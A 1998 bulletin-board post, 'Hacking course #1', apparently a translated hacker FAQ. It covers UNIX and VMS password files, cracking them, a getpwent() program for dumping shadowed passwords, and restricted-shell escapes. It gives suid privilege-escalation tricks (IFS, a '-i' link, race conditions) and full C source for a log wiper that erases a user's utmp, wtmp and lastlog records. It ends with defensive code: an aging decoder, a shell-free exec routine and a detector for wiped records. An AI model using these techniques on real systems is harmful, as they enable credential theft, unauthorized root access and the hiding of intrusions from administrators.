Linux and other materials |
---|
Title | Hacking course #1 1998/06/30 (14:18) |
Name | 김효원 |
Number | 32 |
Views | 230 |
Body |
How can I access the password file on UNIX?

On standard UNIX the password file is /etc/passwd. On a UNIX system with NIS/yp or password shadowing, the password information is kept somewhere else. Each entry in the password file has seven colon-delimited fields. Broken down, a line of the password file looks like this:

Username
Encrypted password (with optional password aging data)
User number
Group number
GECOS information
Home directory
Shell

Sample /etc/passwd entry:

```
will:5fg63fhD3d5gh:9406:12:Will Spencer:/home/fsg/will:/bin/bash
```

How do I crack UNIX passwords?

Contrary to popular belief, the UNIX password file cannot be decrypted. UNIX passwords are encrypted with a one way function. The login program encrypts the password typed at the "password:" prompt and compares it with the encrypted password in the password file.

Password cracking programs use wordlists. Each word in the wordlist is encrypted and compared with the encrypted passwords in the password file.

The best password cracking program released so far is Crack, written by Alec Muffett. For DOS, the best program is CrackJack. CrackJack is available via ftp from clark.net in the /ub/jcase/ directory.

What is password shadowing?

Password shadowing is a security system in which the encrypted password field of /etc/passwd is replaced with a special token, and the real password is stored in a file that normal users cannot read.

On most (but not all) systems, password shadowing can be defeated by writing a program that calls getpwent() repeatedly to build a password file.

Example:

```c
#include <stdio.h>
#include <pwd.h>

int main(void)
{
    struct passwd *p;

    /* Walk the password database and print each entry in passwd format. */
    while ((p = getpwent()))
        printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
               (int)p->pw_uid, (int)p->pw_gid, p->pw_gecos, p->pw_dir,
               p->pw_shell);
    return 0;
}
```

Where can I find the shadowed password file?

```
Unix                  Path                            Token
-----------------------------------------------------------------
AIX 3                 /etc/security/passwd            !
       or             /tcb/auth/files/<first letter   #
                            of username>/<username>
A/UX 3.0s             /tcb/files/auth/?/*
BSD4.3-Reno           /etc/master.passwd              *
ConvexOS 10           /etc/shadpw                     *
ConvexOS 11           /etc/shadow                     *
DG/UX                 /etc/tcb/aa/user/               *
EP/IX                 /etc/shadow                     x
HP-UX                 /.secure/etc/passwd             *
IRIX 5                /etc/shadow                     x
Linux 1.1             /etc/shadow                     *
OSF/1                 /etc/passwd[.dir|.pag]          *
SCO Unix #.2.x        /tcb/auth/files/<first letter   *
                            of username>/<username>
SunOS4.1+c2           /etc/security/passwd.adjunct    ##username
SunOS 5.0             /etc/shadow
                      <optional NIS+ private secure maps/tables/whatever>
System V Release 4.0  /etc/shadow                     x
System V Release 4.2  /etc/security/* database
Ultrix 4              /etc/auth[.dir|.pag]            *
UNICOS                /etc/udb                        *
```

What is NIS/yp?

NIS (Network Information System) is the current name; it used to be called yp (Yellow Pages). The purpose of NIS is to let many machines on a network share configuration information such as passwords. NIS is not designed for system security. If NIS is in use, the /etc/passwd file contains an entry like this:

```
+::0:0:::
```

To see the real password file, use the "ypcat passwd" command.

What are the strange characters after the comma in the password file?

The characters indicate password aging. Password aging makes the user change the password within a period set by the administrator. Password aging can also make a user keep a password for a set amount of time before changing it.

Sample /etc/passwd entry with password aging:

```
will:5fg63fhD3d,M.z8:9406:12:Will Spencer:/home/fsg/will:/bin/bash
```

Note the comma after the encrypted password field. All the characters after the comma are used by the password aging mechanism.

Password aging characters from the example above:

```
M.z8
```

The four characters are interpreted as follows:

1: Maximum number of weeks the password can be used without being changed
2: Minimum number of weeks the password must be used before it can be changed
3&4: When the password was last changed, in weeks since 1970

There are three special cases. When the first and second characters are set to '..', the user must change the password at the next login.
The passwd program then removes the password aging characters, and the user becomes subject to a new password aging period.

When the third and fourth characters are set to '..', the user must change the password at the next login. The passwd program then behaves as in the case of the first and second characters.

If the first character (MAX) is less than the second character (MIN), the user loses permission to change the password. Only root can change that user's password.

Note that the su command does not check the password aging data. It is possible to su to an account with an expired password.

Password Aging Codes

```
+------------------------------------------------------------------------+
|                                                                        |
| Character:  .  /  0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  G  H |
|    Number:  0  1  2  3  4  5  6  7  8  9 10 11 12 13 14 15 16 17 18 19 |
|                                                                        |
| Character:  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  a  b |
|    Number: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
|                                                                        |
| Character:  c  d  e  f  g  h  i  j  k  l  m  n  o  p  q  r  s  t  u  v |
|    Number: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
|                                                                        |
| Character:  w  x  y  z                                                 |
|    Number: 60 61 62 63                                                 |
|                                                                        |
+------------------------------------------------------------------------+
```

How do I access the password file under VMS?

Under VMS the password file is SYS$SYSTEM:SYSUAF.DAT. Unlike UNIX, however, most users do not have permission to read the password file.

How do I crack VMS passwords?

Write a program that uses the SYS$GETUAF functions and compares the results with the encrypted passwords in SYSUAF.DAT. Two such programs exist: CHECK_PASSWORD and GUESS_PASSWORD.

What gets logged?

Almost everything on VMS can be logged. The SHOW ACCOUNTING command shows the logging status of the system. System auditing records log information for security purposes, whereas system accounting records information about account usage (CPU time, printer usage and so on).

To enable accounting, follow this procedure:

```
$ SET ACCOUNTING [/ENABLE=(Activity...)]
```

This records the log information in the file SYS$MANAGER:ACCOUNTING.DAT.
It also closes the previous log file and starts a new version of the log.

The following can be logged:

```
BATCH           Termination of a batch job
DETACHED        Termination of a detached job
IMAGE           Image execution
INTERACTIVE     Interactive job termination
LOGIN_FAILURE   Login failures
MESSAGE         Users messages
NETWORK         Network job termination
PRINT           Print Jobs
PROCESS         Any terminated process
SUBPROCESS      Termination of a subprocess
```

To use security auditing:

```
$ SET AUDIT
```

/ALARM is the option used to raise alarms on the terminals designated as security operators. In other words, the SECURITY privilege is needed.

The security auditing configuration can be displayed with the $ SHOW AUDIT /ALL command. Security auditing can be set to log the following activities:

```
ACL             Access Control List requested events
AUTHORIZATION   Modification to the system user authorization
                file SYS$SYSTEM:SYSUAF.DAT
BREAKIN         Attempted Break-ins
FILE_ACCESS     File or global section access
INSTALL         Occurrence of any INSTALL operations
LOGFAILURE      Any login failures
LOGIN           A login attempt from various sources
LOGOUT          Logouts
MOUNT           Mount or dismount requests
```

What privileges are available on VMS?

```
ACNT            Allows you to restrain accounting messages
ALLSPOOL        Allows you to allocate spooled devices
ALTPRI          Allot Priority. This allows you to set any priority value
BUGCHK          Allows you to make bug check error log entries
BYPASS          Enables you to disregard protections
CMEXEC/CMKRNL   Change to executive or kernel mode. These privileges allow
                a process to execute optional routines with KERNEL and
                EXECUTIVE access modes. CMKRNL is the most powerful
                privilege on VMS as anything protected can be accessed if
                you have this privilege. You must have these privileges to
                gain access to the kernel data structures directly.
DETACH          This privilege allows you to create detached processes of
                arbitrary UICs
DIAGNOSE        With this privilege you can diagnose devices
EXQUOTA         Allows you to exceed your disk quota
GROUP           This privilege grants you permission to affect other
                processes in the same rank
GRPNAM          Allows you to insert group logical names into the group
                logical names table.
GRPPRV          Enables you to access system group objects through system
                protection field
LOG_IO          Allows you to issue logical input output requests
MOUNT           May execute the mount function
NETMBX          Allows you to create network connections
OPER            Allows you to perform operator functions
PFNMAP          Allows you to map to specific physical pages
PHY_IO          Allows you to perform physical input output requests
PRMCEB          Can create permanent common event clusters
PRMGBL          Allows you to create permanent global sections
PRMMBX          Allows you to create permanent mailboxes
PSWAPM          Allows you to change a process's swap mode
READALL         Allows you read access to everything
SECURITY        Enables you to perform security related functions
SETPRV          Enable all privileges
SHARE           Allows you to access devices allocated to other users.
                This is used to assign system mailboxes.
SHMEM           Enables you to modify objects in shared memory
SYSGBL          Allows you to create system wide permanent global sections
SYSLCK          Allows you to lock system wide resources
SYSNAM          Allows you to insert system logical names in the names
                table.
SYSPRV          If a process holds this privilege then it is the same as a
                process holding the system user identification code.
TMPMBX          Allows you to create temporary mailboxes
VOLPRO          Enables you to override volume protection
WORLD           When this is set you can affect other processes in the
                world
```

To find out which privileges a process is running with, use the following command:

```
$ show proc/priv
```

How do I break out of a restricted shell?

A poorly written restricted shell can be escaped by running a program that has a shell function of its own. A good example is vi. Run vi and use the following command.
```
:set shell=/bin/sh
```

Then get a shell with the following command.

```
:shell
```

If the restricted shell prevents use of the "cd" command, ftp into that account and you can cd.

How do I get root privileges from a suid script or program?

1. If the program calls another program through system(), it can be fooled by changing IFS. IFS stands for Internal Field Separator, the character the shell uses to separate arguments.

Suppose the program contains the following:

```
system("/bin/date")
```

If IFS is changed to '/', the shell interprets the command as:

```
bin date
```

Now, if a program named bin is in the path, the suid program runs the program named bin instead of /bin/date.

To change IFS, use one of the following commands:

```
IFS='/'; export IFS
setenv IFS '/'
export IFS='/'
```

2. Link the script to -i.

Create a symbolic link named "-i" to the program. Running "-i" causes the shell (/bin/sh) to start in interactive mode. This only works on suid (set uid) scripts.

Example:

```
% ln suid.sh -i
% -i
#
```

3. Exploit a race condition.

While the kernel is loading /bin/sh, replace the symbolic link to the program with another program.

Example:

```
nice -19 suidprog; ln -s evilprog suidroot
```

4. Send bad input to the program.

Invoke the program and another command on one command line.

Example:

```
suidprog; id
```

How do I erase my presence from the system logs?

Modify the /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog files. These are not text files, so they cannot be edited with vi. A special-purpose program has to be written.
Example:

```c
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"

int f;

void kill_utmp(who)
char *who;
{
    struct utmp utmp_ent;

    if ((f=open(UTMP_NAME,O_RDWR))>=0) {
        while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
            if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                bzero((char *)&utmp_ent,sizeof( utmp_ent ));
                lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
                write (f, &utmp_ent, sizeof (utmp_ent));
            }
        close(f);
    }
}

void kill_wtmp(who)
char *who;
{
    struct utmp utmp_ent;
    long pos;

    pos = 1L;
    if ((f=open(WTMP_NAME,O_RDWR))>=0) {
        while(pos != -1L) {
            lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
            if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
                pos = -1L;
            } else {
                if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                    bzero((char *)&utmp_ent,sizeof(struct utmp ));
                    lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
                    write (f, &utmp_ent, sizeof (utmp_ent));
                    pos = -1L;
                } else pos += 1L;
            }
        }
        close(f);
    }
}

void kill_lastlog(who)
char *who;
{
    struct passwd *pwd;
    struct lastlog newll;

    if ((pwd=getpwnam(who))!=NULL) {
        if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
            lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
            bzero((char *)&newll,sizeof( newll ));
            write(f, (char *)&newll, sizeof( newll ));
            close(f);
        }
    } else printf("%s: ?\n",who);
}

main(argc,argv)
int argc;
char *argv[];
{
    if (argc==2) {
        kill_lastlog(argv[1]);
        kill_wtmp(argv[1]);
        kill_utmp(argv[1]);
        printf("Zap2!\n");
    } else
        printf("Error.\n");
}
```
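The password aging field described in the post can be decoded mechanically when auditing a passwd file. The following is an added example, not part of the original post; the names `decode_aging` and `struct aging` are hypothetical, and the byte order of characters 3 and 4 (least significant first, the a64l() convention) is an assumption the post does not state.

```c
#include <string.h>

/* Aging alphabet from the code table: '.'=0, '/'=1, '0'-'9', 'A'-'Z', 'a'-'z'. */
static const char AGE64[] =
    "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

struct aging {
    int present;      /* password field carries aging data after a comma */
    int max_weeks;    /* character 1 */
    int min_weeks;    /* character 2 */
    int last_change;  /* characters 3-4: weeks since 1970 */
    int must_change;  /* a ".." pair: change required at next login */
    int root_only;    /* MAX < MIN: only root can change the password */
};

static int val64(char c)
{
    const char *p = c ? strchr(AGE64, c) : NULL;
    return p ? (int)(p - AGE64) : -1;
}

/* Decode one passwd line: 0 on success (see out->present), -1 if malformed. */
int decode_aging(const char *line, struct aging *out)
{
    memset(out, 0, sizeof *out);
    const char *pw = strchr(line, ':');
    const char *end = pw ? strchr(pw + 1, ':') : NULL;
    if (!end) return -1;
    const char *a = memchr(pw + 1, ',', (size_t)(end - pw - 1));
    if (!a) return 0;                         /* no aging data */
    a++;
    size_t n = (size_t)(end - a);
    if (n != 2 && n != 4) return -1;
    for (size_t i = 0; i < n; i++)
        if (val64(a[i]) < 0) return -1;
    out->present = 1;
    out->max_weeks = val64(a[0]);
    out->min_weeks = val64(a[1]);
    /* Assumption: least-significant character first, as a64l() reads it. */
    if (n == 4) out->last_change = val64(a[2]) + 64 * val64(a[3]);
    out->must_change = (a[0] == '.' && a[1] == '.') ||
                       (n == 4 && a[2] == '.' && a[3] == '.');
    out->root_only = out->max_weeks < out->min_weeks;
    return 0;
}
```

For the post's sample entry this yields MAX 24 weeks, MIN 0 weeks and a last change 703 weeks after 1970.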
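The IFS item in the suid section depends on a privileged program handing a command string to the shell through system(). As an added example (not part of the original post), this is one way a program can run a helper without that exposure: absolute path only, no shell, a fixed environment, and privileges dropped first. The function name `run_clean` and the contents of `CLEAN_ENV` are assumptions made for the illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment for the child: nothing is inherited from the caller,
 * so a caller-supplied IFS or PATH never reaches the program being run. */
static char *const CLEAN_ENV[] = { "PATH=/bin:/usr/bin", "IFS= \t\n", NULL };

/* Run prog with argv and return its exit status. Returns -1 if prog is not
 * an absolute path or fork/wait fails; 127 if privileges could not be
 * dropped or the exec itself failed. */
int run_clean(const char *prog, char *const argv[])
{
    if (prog == NULL || prog[0] != '/')
        return -1;                        /* never search PATH */
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* Give up any set-gid/set-uid privilege before running the helper. */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(127);
        execve(prog, argv, CLEAN_ENV);    /* no shell, so no word splitting */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char *args[] = { "date", NULL };
    int rc = run_clean("/bin/date", args);   /* the helper named in the post */
    printf("exit status: %d\n", rc);
    return rc == 0 ? 0 : 1;
}
```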
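The program in the post overwrites matching utmp/wtmp records with zero bytes, which leaves a detectable artifact: a record with no type, line, user or timestamp. As an added example (not part of the original post), the following check counts such records in a utmp-format stream; the function names and the default path /var/log/wtmp are assumptions, and a hit is a heuristic indicator that deserves a closer look, not proof of tampering.

```c
#include <stdio.h>
#include <string.h>
#include <utmp.h>

/* 1 if every byte of the record is zero, which is what the bzero()
 * followed by write() in the program above leaves behind. */
int is_wiped(const struct utmp *u)
{
    static const struct utmp zero;
    return memcmp(u, &zero, sizeof zero) == 0;
}

/* Scan a utmp-format stream. Returns the number of all-zero records,
 * stores the index of the first one (-1 if none) and the count of
 * leftover bytes when the size is not a whole number of records. */
long scan_utmp_stream(FILE *fp, long *first_wiped, long *trailing)
{
    struct utmp u;
    long idx = 0, wiped = 0;
    size_t got;

    *first_wiped = -1;
    while ((got = fread(&u, 1, sizeof u, fp)) == sizeof u) {
        if (is_wiped(&u)) {
            if (*first_wiped < 0)
                *first_wiped = idx;
            wiped++;
        }
        idx++;
    }
    *trailing = (long)got;
    return wiped;
}

int main(int argc, char **argv)
{
    /* Default path is an assumption; the post's systems used /usr/adm/wtmp. */
    const char *path = argc > 1 ? argv[1] : "/var/log/wtmp";
    FILE *fp = fopen(path, "rb");
    long first, trailing;

    if (!fp) { perror(path); return 2; }
    long n = scan_utmp_stream(fp, &first, &trailing);
    fclose(fp);
    printf("%s: %ld all-zero record(s), first at index %ld, %ld trailing byte(s)\n",
           path, n, first, trailing);
    return n > 0 || trailing > 0;
}
```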